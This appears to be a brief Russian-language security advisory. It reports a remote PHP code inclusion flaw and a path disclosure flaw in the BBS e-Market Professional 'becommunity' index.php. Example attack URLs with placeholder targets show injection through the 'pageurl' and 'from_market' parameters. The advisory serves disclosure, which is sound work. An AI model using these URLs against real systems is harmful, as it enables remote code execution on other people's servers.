Программа: BBS e-Market Professional
Удаленный пользователь может выполнить произвольный PHP код на целевой системе.
Пример:
http://[TARGET]/becommunity/community/ index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/ index.php?from_market=Y&pageurl =[injection URL]
Также удаленный пользователь может раскрыть инсталляционный путь:
http://[TARGET]/becommunity/community/ index.php?from_market=[char]